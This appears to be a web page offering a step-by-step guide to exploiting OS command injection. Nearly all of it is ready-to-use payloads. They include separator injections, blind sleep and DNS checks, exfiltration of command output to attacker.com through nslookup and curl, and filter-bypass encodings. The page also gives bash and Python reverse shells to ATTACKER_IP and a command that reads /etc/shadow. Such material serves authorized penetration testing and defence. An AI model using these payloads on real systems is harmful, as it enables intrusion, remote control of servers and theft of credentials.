$loading...
Step-by-step guide to finding and exploiting OS command injection vulnerabilities using command separators, inline execution, and blind techniques.
Find application features that likely invoke system commands: ping/traceroute utilities, file operations, PDF/image processing, DNS lookups, and any functionality that wraps CLI tools.
ip=127.0.0.1
filename=test.pdf
host=example.com
Inject command separators to append your own commands. Different operating systems use different separators. Test each to determine the OS and which characters are allowed.
127.0.0.1; whoami
127.0.0.1 | id
127.0.0.1 || id
127.0.0.1 & whoami
127.0.0.1 && id
`whoami`
$(id)
If output is not reflected, use time delays or out-of-band techniques to confirm execution. DNS-based exfiltration is reliable when HTTP callbacks are blocked.
127.0.0.1; sleep 10
127.0.0.1 | ping -c 10 127.0.0.1
127.0.0.1; nslookup $(whoami).attacker.com
127.0.0.1; curl http://attacker.com/$(whoami)
If certain characters or commands are blocked, try alternatives: variable expansion, wildcard globbing, encoding, newline injection, and command substitution variations.
127.0.0.1;w\"h\"oami
127.0.0.1;/b??/w?oami
127.0.0.1;$(printf "\x77\x68\x6f\x61\x6d\x69")
127.0.0.1%0aid
Once command execution is confirmed, attempt to establish a reverse shell for interactive access. Use the Reverse Shell generator to craft OS-appropriate payloads.
; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
| python3 -c 'import socket,subprocess;s=socket.socket();s.connect(("ATTACKER_IP",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'Record the vulnerable parameter, OS type, injection technique, and achievable impact. Command injection typically results in full system compromise, making it a critical finding.
; cat /etc/shadow
; net user administrator
Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides